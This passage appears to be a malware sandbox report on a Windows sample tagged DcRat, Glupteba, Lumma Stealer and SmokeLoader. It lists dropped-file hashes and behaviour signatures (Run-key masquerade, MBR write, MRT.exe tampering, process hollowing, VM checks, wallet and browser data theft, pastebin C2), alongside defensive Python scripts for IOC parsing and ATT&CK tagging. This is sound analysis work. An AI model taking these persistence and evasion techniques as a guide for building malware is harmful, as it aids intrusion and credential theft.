SHA512 3270b1951106e7b91738d3f0c6fc71396e1ee0a516edfccc852bc29b0369f8c413a4ec28350c38dacbfceac0d3af2c26f2321a25bcbaf6e5855c82f444e83779

memory/2060-337-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2848-342-0x00000000025B0000-0x00000000029A8000-memory.dmp

memory/2848-345-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1628-346-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1204-351-0x000000001B200000-0x000000001B4E2000-memory.dmp

memory/1204-352-0x0000000001D50000-0x0000000001D58000-memory.dmp

memory/1204-353-0x000007FEF4B50000-0x000007FEF54ED000-memory.dmp

memory/1204-354-0x00000000025F0000-0x0000000002670000-memory.dmp

memory/1204-355-0x00000000025F4000-0x00000000025F7000-memory.dmp

memory/1204-357-0x000007FEF4B50000-0x000007FEF54ED000-memory.dmp

memory/1204-356-0x00000000025FB000-0x0000000002662000-memory.dmp

memory/1204-358-0x000007FEF4B50000-0x000007FEF54ED000-memory.dmp

memory/1488-359-0x0000000000400000-0x00000000022D9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 b03886cb64c04b828b6ec1b2487df4a4
SHA1 a7b9a99950429611931664950932f0e5525294a4
SHA256 5dfaa8987f5d0476b835140d8a24fb1d9402e390bbe92b8565da09581bd895fc
SHA512 21d1a5a4a218411c2ec29c9ca34ce321f6514e7ca3891eded8c3274aeb230051661a86eda373b9a006554e067de89d816aa1fa864acf0934bbb16a6034930659

\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 147b6aa5bd0222e5d58af8984b073c56
SHA1 399923e38ba252bffbe5c13b39bcbf41798e15f5
SHA256 6a2447d974f6eeaaa5ad420a24faa13417df7ebd5c76d0b872a11183d29c5bd9
SHA512 c0002076c0eed73addcaee17d389293eee9b462d02187944ad7c5a5235b78265257efc958473d91bd5e63f3b0a8ed7ed166a550f311c348170914620da519d70

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 b29cd31f15d37cebbe2804adc62ce2e9
SHA1 e036f370e3b9a849609823c1cf295c07968b91a0
SHA256 082ab87e967c75809e40fab5cdfd97aa48c3827b52e26188d9fabfadd5da4bf2
SHA512 2a031213cadf534acf2ef564937fa6102f7103d91513498c0c4dfef4f3056a1f568e7db70ef9ad817e75117dbead7b0f5e4e8bf59767f026ca09831f321860f4

memory/2620-375-0x0000000000E60000-0x0000000000E68000-memory.dmp

memory/1488-377-0x0000000002410000-0x0000000002510000-memory.dmp

memory/2620-374-0x0000000019B20000-0x0000000019E02000-memory.dmp

memory/2620-378-0x000007FEF4980000-0x000007FEF531D000-memory.dmp

memory/2620-380-0x0000000001110000-0x0000000001190000-memory.dmp

memory/2620-381-0x000007FEF4980000-0x000007FEF531D000-memory.dmp

memory/2620-382-0x0000000001110000-0x0000000001190000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 7c277165dcead3616b33d9432afcb485
SHA1 b725f0009bb07f8c3f434adc10ccc8d78967ea62
SHA256 a3548e60aee3eacd24068a097a0fd848bf9d61a19e54a88068b5be7539384c30
SHA512 2f5d098b0ca693dc399479f293ce38b0254149481dcc397715cff47a55b870c2a3ae7824cc1587838ce0f511633fecc961384e836bbccde66734207d1f5e8105

\Windows\rss\csrss.exe

MD5 8968359e460df9992c18c113c1c17674
SHA1 1370811cb82506f311c9ea7564df9a0029bd2265
SHA256 da196e9c74d5f55018e8b34e506f8d15dafaff07ad297215139e28bc2f11f07c
SHA512 cc9ce4a2cf680d5bf9945ee00600877e4a28a940888e6e9db90b431469f2a926fb386a4cb98243d60da4ad52353088d156a6815b1335e6b9077ed04a13e9f7d3

memory/2520-394-0x00000000002D0000-0x0000000000D7D000-memory.dmp

memory/2848-396-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2620-398-0x0000000001110000-0x0000000001190000-memory.dmp

memory/2620-399-0x000007FEF4980000-0x000007FEF531D000-memory.dmp

memory/2788-407-0x0000000002780000-0x0000000002B78000-memory.dmp

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 029a5147d2f0d080800b095d06298a55
SHA1 6d53b0c00f128318d23de9db082989e30369baad
SHA256 cd1818fa6f2a4cbdd75985ba9e36c6141d206f5728b994875c3af7c874938566
SHA512 b035c22bd7b41375cff69882f696d37f8167c12a770da3f6d919d1350789bd1f1d4cfc623fe325c696b3f30e96632bbd1233cdff878df05e8c5b7a153f3c9e1c
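The listing above repeats the same path under several spellings and with several hash sets, and mixes in memory-region lines, which makes it tedious to turn into block-list entries by hand. The Python below is an added example, not part of the sandbox report or its tooling: it parses exactly this layout into records, folds the report's three spellings of one path onto one key, drops the zero-byte digest, and reports paths that were written more than once with different content. The embedded SAMPLE is an excerpt of the listing above; the function and class names are the example's own.

```python
"""Turn a sandbox report's flattened per-file hash listing into usable IOCs. Layout: a path
line, a blank line, then MD5/SHA1/SHA256/SHA512 lines; memory/...-memory.dmp lines are dumped regions."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Digest of a zero-byte file: such a record was hashed before anything was written to it.
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
_HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
_HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}   # also the field order below


@dataclass(frozen=True)
class FileRecord:
    path: str
    md5: str
    sha1: str
    sha256: str
    sha512: str


def normalize_path(path: str) -> str:
    """Fold the report's spellings of one file onto one key: the same object shows up
    as C:\\Users\\..., \\Users\\... and \\??\\c:\\users\\... depending on the API hooked."""
    p = path.strip()
    if p.startswith("\\??\\"):
        p = p[4:]
    if re.match(r"^[A-Za-z]:\\", p):
        p = p[2:]
    return p.lower()


def parse_file_listing(text: str) -> list[FileRecord]:
    files: list[FileRecord] = []
    path, digests = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("memory/"):   # blank, or a memory-dump region
            continue
        if m := _HASH_LINE.match(line):
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != _HEX_LEN[algo]:         # catches a truncated copy/paste
                raise ValueError(f"{algo} for {path!r} has {len(digest)} hex digits")
            digests[algo] = digest
            if path and len(digests) == 4:            # SHA512 is last: record complete
                files.append(FileRecord(path, *(digests[a] for a in _HEX_LEN)))
        else:                                         # any other line opens a record
            path, digests = line, {}
    return files


def rewritten_paths(files: list[FileRecord]) -> dict[str, set[str]]:
    """Paths written more than once with different content (a loader replacing its
    own drop, or a payload rewriting itself); zero-byte placeholders are ignored."""
    seen: dict[str, set[str]] = {}
    for f in files:
        if f.sha256 != EMPTY_SHA256:
            seen.setdefault(normalize_path(f.path), set()).add(f.sha256)
    return {p: s for p, s in seen.items() if len(s) > 1}


def hash_iocs(files: list[FileRecord]) -> list[str]:
    """Distinct SHA-256 values worth blocking, with the zero-byte digest dropped."""
    return sorted({f.sha256 for f in files if f.sha256 != EMPTY_SHA256})


# Excerpt of the report's own listing above, embedded so the script runs offline.
SAMPLE = r"""
\Users\Admin\AppData\Local\Temp\D911.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
memory/2456-33-0x0000000010000000-0x000000001020A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp

MD5 49becb0626a04b87221c00d30c3d14a2
SHA1 96e2f9ea00aa118ce62a368ded287f6b888c0cd4
SHA256 95480cadb85d9df813521fd2360328eafc500001fa487324d3ec571397382b3f
SHA512 a1f4fef9d039fd42a704d68b68552e3932d258123a02a3c66c78b8b2d48623b1e305662b378e0024d9c8b419824d3fd1b91dec96c5149123d945e7707bd6eda2
\??\c:\users\admin\appdata\local\temp\is-flfhf.tmp\590.tmp

MD5 951ac648539bfaa0f113db5e0406de5b
SHA1 1b42de9ef8aaf1740de90871c5fc16963a842f43
SHA256 bb02f28cc67276b8d6609f80553c4976b2acbd34459af17167f8c1b001a84dfe
SHA512 795e654e82d38905841c3af120fb8288e3f81580a559d97266c739d101b335807b99c2592388b3b4af411f626e8d2f3966316152ca62b87a4361a8da78919b2d
"""

if __name__ == "__main__":
    files = parse_file_listing(SAMPLE)
    print(f"{len(files)} records, {sum(f.sha256 == EMPTY_SHA256 for f in files)} zero-byte")
    for p, s in rewritten_paths(files).items():
        print(f"{p}: written with {len(s)} different contents")
    print("\n".join(hash_iocs(files)))
```

Run against the full listing, the same script shows which drops were overwritten in place (E024.exe, 7DBF.exe and 288c47bbc1871b439df19ff4df68f076.exe each appear with several digests) and yields a SHA-256 set that can go straight into a block list.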

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-27 01:44

Reported

2024-02-27 01:46

Platform

win10v2004-20240226-en

Max time kernel

94s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\F84C.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

SmokeLoader

trojan backdoor smokeloader

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Note: the report records netsh.exe running but not its arguments. On an affected host list the rules (netsh advfirewall firewall show rule name=all) and look for allow rules that name the dropped binaries or open inbound ports.

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\375C.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\F84C.exe N/A

Note: the value name and file name imitate csrss.exe, the Client/Server Runtime Subsystem, which is only ever loaded from C:\Windows\System32. A Run entry pointing at C:\ProgramData\Drivers\csrss.exe is a masquerade; on a host that ran this sample, collect that file and delete the value before rebooting.

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\FACE.exe N/A

Note: \??\PHYSICALDRIVE0 is the raw boot disk. Opening it for write bypasses the file system and is exactly the access an MBR bootkit needs; code planted there survives removal of the dropped files. On an affected host compare sector 0 of the boot disk against a known-good MBR and rewrite it (or wipe the disk) rather than cleaning the file system alone.

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe N/A

Note: MRT.exe is the Windows Malicious Software Removal Tool. A dropper opening it for modification is tampering with a defensive binary, not merely dropping a file; verify the Authenticode signature of MRT.exe on affected hosts and treat a failed check as confirmation.

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 924 set thread context of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe

Note: the parent F84C.exe (PID 924) set the thread context of PID 3232, a second instance of the same image. That is consistent with process hollowing: a suspended copy of the image is created, its memory replaced, and its thread redirected. If so, what actually executed lives in PID 3232's memory rather than in the F84C.exe file on disk, so file hashes of F84C.exe identify the packed stager, not the payload.

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp

Checks SCSI registry key(s)

Note: Enum\SCSI holds the disk vendor and model strings, which name the hypervisor on a virtual machine (VMware, VBOX, QEMU); the ProcessorNameString read recorded under the next signature serves the same purpose. Read together these are sandbox checks rather than hardware inventory.

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\4901.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\4901.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\4901.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
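The signature tables above carry their evidence as whitespace-separated rows in which the first two columns themselves contain spaces, so they do not split cleanly. The Python below is an added example, not sandbox code: it parses those rows into structured events and tags each with the ATT&CK technique it evidences, using rows copied from this section as its sample input. The technique mapping is this example's own reading of the rows (the report itself only carries tags such as persistence and evasion), and the parser assumes, as holds here, that the Process and Target columns never contain spaces.

```python
"""Parse the report's flattened signature rows ("Description Indicator Process Target",
whitespace-separated, with spaces inside the first two columns) into structured events
and tag each with the ATT&CK technique it evidences."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Longest verbs first so "Key value queried" is not cut down to "Key queried".
_VERBS = ["File opened for modification", "Key value queried", "Set value (str)",
          "Key enumerated", "Key created", "Key opened", "Key queried"]
_THREAD_CTX = re.compile(r"^PID \d+ set thread context of \d+$")


@dataclass(frozen=True)
class Event:
    description: str
    indicator: str
    process: str
    target: str


def parse_row(row: str) -> Event:
    """Split one row. Assumes, as holds throughout this report, that the Process and
    Target columns are single tokens; paths containing spaces would break that."""
    tokens = row.split()
    if len(tokens) < 4:
        raise ValueError(f"not a four-column row: {row!r}")
    process, target = tokens[-2], tokens[-1]
    head = " ".join(tokens[:-2])                 # Description + Indicator, both may contain spaces
    for verb in _VERBS:
        if head.startswith(verb + " "):
            return Event(verb, head[len(verb) + 1:], process, target)
    if head.startswith("N/A "):                  # signature fired without detail
        return Event("N/A", head[4:], process, target)
    if head.endswith(" N/A") and _THREAD_CTX.match(head[:-4]):
        return Event(head[:-4], "N/A", process, target)
    raise ValueError(f"unrecognised description in {row!r}")


# (technique id, label, predicate over one Event). The mapping is this example's reading
# of the rows; the report itself only carries tags such as "persistence" or "evasion".
_RULES = [
    ("T1547.001", "Registry Run key persistence",
     lambda e: e.description == "Set value (str)" and "\\CurrentVersion\\Run\\" in e.indicator),
    ("T1036.005", "Masquerading: system binary name outside System32",
     lambda e: e.description == "Set value (str)" and "csrss.exe" in e.indicator.lower()
     and "\\windows\\system32\\csrss.exe" not in e.indicator.lower()),
    ("T1542.003", "Bootkit: raw write handle to the boot disk",
     lambda e: e.description == "File opened for modification"
     and e.indicator.upper().endswith("PHYSICALDRIVE0")),
    ("T1055.012", "Process hollowing: SetThreadContext on a second copy of itself",
     lambda e: e.description.startswith("PID ") and e.process == e.target),
    ("T1497.001", "Sandbox/VM check via SCSI enumeration keys",
     lambda e: e.description.startswith("Key") and "\\Enum\\SCSI" in e.indicator),
    ("T1614", "System location discovery via Geo\\Nation",
     lambda e: e.description == "Key value queried" and e.indicator.endswith("\\Geo\\Nation")),
    ("T1562.001", "Impair defenses: tampering with MRT.exe",
     lambda e: e.description == "File opened for modification"
     and e.indicator.lower().endswith("\\system32\\mrt.exe")),
    ("T1562.004", "Firewall modification via netsh", lambda e: e.process.lower().endswith("\\netsh.exe")),
    ("T1053.005", "Scheduled task via schtasks", lambda e: e.process.lower().endswith("\\schtasks.exe")),
    ("T1543.003", "Service creation/control via sc.exe", lambda e: e.process.lower().endswith("\\sc.exe")),
    ("T1102", "Web service (pastebin) for payload hosting/C2",
     lambda e: e.indicator.lower().endswith("pastebin.com")),
]


def classify(event: Event) -> list[str]:
    return [f"{tid} {label}" for tid, label, pred in _RULES if pred(event)]


def tag_rows(rows: list[str]) -> list[tuple[Event, list[str]]]:
    return [(e, classify(e)) for e in map(parse_row, rows)]


# Rows copied from the behavioral2 signature tables above (constructed inline).
ROWS = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\F84C.exe N/A',
    r'File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\FACE.exe N/A',
    r'PID 924 set thread context of 3232 N/A C:\Users\Admin\AppData\Local\Temp\F84C.exe C:\Users\Admin\AppData\Local\Temp\F84C.exe',
    r'Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\375C.exe N/A',
    r'Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\4901.exe N/A',
    r'File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\FourthX.exe N/A',
    r'N/A N/A C:\Windows\system32\netsh.exe N/A',
    r'N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A',
    r'N/A N/A C:\Windows\system32\sc.exe N/A',
    r'N/A pastebin.com N/A N/A',
]

if __name__ == "__main__":
    for event, tags in tag_rows(ROWS):
        name = event.process.rsplit("\\", 1)[-1]
        print(f"{name:>14}  {event.description:<34} -> {', '.join(tags)}")
```

The sc.exe rule is deliberately coarse: the rows give no arguments, so the same row backs both the "Creates new service(s)" and "Stops running service(s)" signatures (the latter is T1489 Service Stop); extend the predicate once command lines are available.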

Modifies data under HKEY_USERS

Note: HKEY_USERS\.DEFAULT is the profile hive that LocalSystem processes see as HKCU, so writes here by powershell.exe, schtasks.exe and 288c47bbc1871b439df19ff4df68f076.exe indicate those processes were running as SYSTEM at that point. The SystemCertificates keys are created when CryptoAPI opens a certificate store in a fresh profile, and the @tzres.dll MuiCache strings are the residue of a process resolving time-zone display names (a trail Go-compiled binaries commonly leave); neither is a deliberate configuration change, but the SYSTEM-level execution they reveal is the finding.

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe N/A
